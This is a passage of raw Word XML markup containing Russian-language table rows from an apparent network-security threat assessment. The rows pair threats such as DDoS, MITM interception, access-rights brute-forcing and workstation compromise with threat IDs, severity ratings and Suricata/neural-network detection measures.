              <w:t xml:space="preserve"> отличать сложные </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-атаки от легитимного всплеска трафика.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65B687FD"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1753" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="268BDB30" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="006A2201" w:rsidRDefault="008E0171"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Использование нейронной сети для выявления</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1903">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-трафика</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> на основе </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
            <w:r w:rsidRPr="006A2201">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00913F86" w14:paraId="64314962" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="2263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54264B79"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C2A4702"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Деградация ресурсов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CF300B3" w14:textId="390F7CF8"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xml:space="preserve">УБИ.153 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716EBF39"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40AAD2A3"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Отсутствие сигнатур для новых C&amp;C-серверов и скрытого майнинга.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="745F8477"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1753" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F69AD7D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="006A2201"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6A2201">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Детекция аномальных паттернов сетевого взаимодействия </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>с использованием нейронной сети.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93B26" w:rsidRPr="00913F86" w14:paraId="5973101B" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="2538"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E2BB1B5" w14:textId="7777777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Конфиденциальность сетевого трафика и данных</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D91E8D" w14:textId="7D4D3E0C" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00BE2712">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175DAEC" w14:textId="7777777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Перехват и утечка информации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="715C3F16" w14:textId="2239FDA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xml:space="preserve">УБИ.116 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AED2766" w14:textId="7777777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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="770D705C" w14:textId="7777777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Сложность анализа зашифрованного (TLS) трафика на предмет аномалий, указывающих на MITM-атаку.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="599C6072" w14:textId="7777777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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1753" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F2CEC53" w14:textId="7777777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Анализ метаданных и поведенческих паттернов TLS/SSL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> нейросетевым модулем.</w:t>
            </w:r>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93B26" w:rsidRPr="00913F86" w14:paraId="5D4037BA" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="2009"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00771D21" w14:textId="6E0197DB" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00BE2712">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74A530C9" w14:textId="756CE1F7" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00BE2712">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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="004D78E6" w14:textId="25C4B50E" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00BE2712">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xml:space="preserve">УБИ.159 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3723C188" w14:textId="5A1A1D28" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00BE2712">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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71C45E2A" w14:textId="5292133A" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00BE2712">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Р</w:t>
            </w:r>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>есурсы с неверными правами доступа могут быть выявлены перебором.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="155D5EBB" w14:textId="6815325A" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00BE2712">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Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1753" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A07EDF2" w14:textId="10398E79" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00BE2712">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF0386">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Нейросетевой анализ последовательности HTTP-запросов</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00913F86" w14:paraId="571C12CA" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="1822"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52F69C05" w14:textId="619F3B3F" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00" w:rsidP="00357C00">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Целостность и безопасность конечных точек</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59CC443B" w14:textId="34B0BDEC" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00" w:rsidP="00357C00">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Компрометация рабочих станций</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C62722A" w14:textId="7B72DEFF" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00" w:rsidP="00357C00">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xml:space="preserve">УБИ.167 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37C269DC" w14:textId="00E1DBCB" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00" w:rsidP="00357C00">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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3863E408" w14:textId="73B9B7A9" w:rsidR="00357C00" w:rsidRDefault="00357C00" w:rsidP="00357C00">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Посещение сотрудниками скомпрометированных или фишинговых ресурсов.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B2FC8D7" w14:textId="36C7C216" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00" w:rsidP="00357C00">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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1753" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2338DA51" w14:textId="286D9664" w:rsidR="00357C00" w:rsidRPr="00FF0386" w:rsidRDefault="00357C00" w:rsidP="00357C00">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xml:space="preserve">Анализ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>сетевого трафика нейросетевым модулем +</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1903">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 xml:space="preserve">базовая </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1903">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="585DA129" w14:textId="001ABC74" w:rsidR="00357C00" w:rsidRPr="00357C00" w:rsidRDefault="00357C00" w:rsidP="00357C00">
      <w:pPr>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8</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9686" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1413"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="851"/>
        <w:gridCol w:w="1894"/>
      </w:tblGrid>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00913F86" w14:paraId="4131A5F8" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D7CADFC" w14:textId="06DEA1C2" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="732B6E4A" w14:textId="25F03877" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
